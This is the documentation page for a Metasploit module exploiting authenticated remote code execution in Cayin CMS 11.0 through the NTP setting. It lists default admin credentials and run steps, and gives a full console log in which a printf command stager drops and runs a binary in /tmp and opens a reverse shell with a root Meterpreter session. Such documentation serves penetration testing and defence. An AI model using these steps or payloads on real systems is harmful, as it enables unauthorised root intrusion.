adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/linux/http/cayin_cms_ntp.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

71 lines
3.4 KiB
Markdown
Raw Normal View History

cleanup
2020-06-12 10:46:44 -04:00
## Vulnerable Application
This module exploits an authenticated RCE in Cayin CMS <= 11.0. The
RCE is executed in the `system_service.cgi` file's `ntpIp` Parameter.
The field is limited in size, so repeated requests are made to
achieve a larger payload. Cayin CMS-SE is built for Ubuntu 16.04
(20.04 failed to install correctly), so the environment should be
pretty set and not dynamic between targets. Results in root level
access.
With CMS-SE's UI there are several options for NTP server.
1. Test (this runs the RCE 3 times, thus is exploitable, a different
strategy like `wget` would be required)
2. Save (saves the data, but doesn't run it)
3. Update (what was used in this exploit)
Default authentication for the system is administrator:admin from
[Guide](http://onlinehelp.cayintech.com/cmsServer/MCS110EN-01/Web_Manager.html)
## Verification Steps
1. Install the application on Ubuntu 16.04
2. Start msfconsole
3. Do: ```exploits/linux/http/cayin_cms_ntp```
4. Do: ```set rhosts [ip]```
5. Do: ```run```
6. You should get a root shell.
## Options
## Scenarios
### Cayin CMS-SE 11.0 build 19071 on Ubuntu 16.04
```
[*] Processing cayin_cms.rb for ERB directives.
resource (cayin_cms.rb)> use exploits/linux/http/cayin_cms_ntp
resource (cayin_cms.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (cayin_cms.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (cayin_cms.rb)> set lport 6666
lport => 6666
resource (cayin_cms.rb)> set verbose true
verbose => true
resource (cayin_cms.rb)> check
[+] Cayin CMS install detected
[*] 2.2.2.2:80 - The service is running, but could not be validated.
resource (cayin_cms.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:6666
[+] Cayin CMS install detected
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0'>>/tmp/TCKAi", "printf '\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\300\\250\\2\\307\\150\\2\\0\\32\\12\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200'>>/tmp/TCKAi", "printf '\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170'>>/tmp/TCKAi", "printf '\\20\\133\\211\\341\\231\\262\\152\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/TCKAi ; chmod +x /tmp/TCKAi ; /tmp/TCKAi"]
[*] Command Stager progress - 26.60% done (199/748 bytes)
[*] Command Stager progress - 53.07% done (397/748 bytes)
[*] Command Stager progress - 79.81% done (597/748 bytes)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (980808 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:6666 -> 2.2.2.2:57446) at 2020-06-12 10:30:21 -0400
[*] Command Stager progress - 100.00% done (748/748 bytes)
meterpreter > getuid
Server username: no-user @ CMS-SE (uid=0, gid=1001, euid=0, egid=1001)
meterpreter > sysinfo
Computer : CMS-SE
OS : Ubuntu 16.04 (Linux 4.4.0-179-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
```
Reference in New Issue Copy Permalink